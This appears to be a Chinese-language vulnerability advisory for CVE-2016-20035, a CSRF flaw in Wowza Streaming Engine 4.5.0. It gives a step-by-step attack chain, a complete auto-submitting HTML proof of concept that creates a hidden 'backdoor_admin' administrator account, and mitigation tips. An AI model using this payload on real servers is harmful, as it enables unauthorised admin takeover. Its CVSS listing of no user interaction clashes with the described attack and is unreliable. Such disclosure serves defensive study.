CVE-2016-20035 Wowza Streaming Engine 4.5.0 CSRF跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2016-20035

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wowza Streaming Engine

漏洞概述

CVE-2016-20035是Wowza Streaming Engine 4.5.0中存在的一个跨站请求伪造(Cross-Site Request Forgery, CSRF)安全漏洞。Wowza Streaming Engine是一款广泛使用的流媒体服务器软件，用于音视频内容的实时转码和流媒体分发。该漏洞源于应用程序未对用户编辑端点(user edit endpoint)实施有效的CSRF防护机制。攻击者可以通过精心构造恶意网页，诱骗已登录的管理员访问，当管理员访问该恶意页面时，浏览器会自动向目标服务器的敏感端点发送POST请求。由于管理员已通过身份认证，服务器会认为这是合法的管理操作，从而执行攻击者预设的操作，包括创建具有任意凭证的新管理员账户。成功利用此漏洞的攻击者可以在不知会管理员的情况下获取系统完全控制权，对流媒体服务的安全性和可用性造成严重威胁。

技术细节

该CSRF漏洞存在于Wowza Streaming Engine 4.5.0的用户管理功能模块。漏洞的根本原因在于应用程序缺少对用户编辑端点的CSRF token验证机制。攻击者利用此漏洞的具体技术细节如下：攻击者首先构造一个包含自动提交表单的恶意HTML页面，表单的action指向目标Wowza服务器的用户编辑端点(通常为/admin/userEdit.html或类似路径)，表单中包含用于创建新管理员账户的参数，如username、password和admin权限设置等。当已登录的管理员访问该恶意页面时，浏览器的同源策略会阻止直接读取目标页面的内容，但会自动提交表单请求到目标服务器。由于浏览器会自动携带目标域的Cookie信息，服务器会认为这是一个来自已认证用户的合法请求，从而执行账户创建操作。攻击者可以利用此方式创建具有管理员权限的后门账户，实现对整个流媒体系统的持久化控制。

攻击链分析

STEP 1

步骤1

攻击者首先收集目标Wowza Streaming Engine服务器的信息，包括服务器地址和管理员登录入口

STEP 2

步骤2

攻击者编写包含恶意表单的HTML页面，表单指向服务器的用户编辑端点，包含创建新管理员账户的参数

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他方式诱骗已登录的管理员访问恶意网页

STEP 4

步骤4

管理员浏览器自动向目标服务器发送POST请求，由于浏览器自动携带有效的认证Cookie，服务器认为是合法请求

STEP 5

步骤5

服务器执行请求，在系统中创建具有管理员权限的新账户，攻击者获得系统完全控制权

STEP 6

步骤6

攻击者使用新创建的管理员账户登录系统，执行进一步的攻击活动，如窃取敏感数据或破坏服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2016-20035: Wowza Streaming Engine User Edit CSRF -->
<!DOCTYPE html>
<html>
<head>
    <title>Wowza Streaming Engine CSRF PoC</title>
</head>
<body>
    <h2>CVE-2016-20035 CSRF Attack PoC</h2>
    <p>This PoC demonstrates the CSRF vulnerability in Wowza Streaming Engine 4.5.0</p>
    <p>Target: Create a new admin account on the Wowza server</p>
    
    <!-- Auto-submit form targeting Wowza user edit endpoint -->
    <form id="csrfForm" action="http://target-server:8080/admin/userEdit.html" method="POST" style="display:none;">
        <!-- CSRF vulnerability: No CSRF token validation -->
        <input type="hidden" name="moduleName" value="users" />
        <input type="hidden" name="operation" value="add" />
        <input type="hidden" name="userName" value="backdoor_admin" />
        <input type="hidden" name="password" value="P@ssw0rd123!" />
        <input type="hidden" name="confirmPassword" value="P@ssw0rd123!" />
        <input type="hidden" name="description" value="CSRF Created Account" />
        <input type="hidden" name="userRoles" value="admin" />
        <input type="hidden" name="publishingPassword" value="" />
        <input type="hidden" name="enabled" value="true" />
        <input type="hidden" name="saved" value="true" />
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
        console.log('CSRF request sent to target server');
    </script>
</body>
</html>

影响范围

Wowza Streaming Engine 4.5.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 为管理员账户启用双因素认证；2) 配置Web应用防火墙(WAF)规则检测和阻止异常的CSRF请求；3) 限制管理界面的访问来源IP，仅允许内网或可信IP段访问；4) 定期检查系统日志，关注异常的管理员操作记录；5) 提醒管理员不要点击来源不明的链接，特别是那些要求访问管理界面的链接。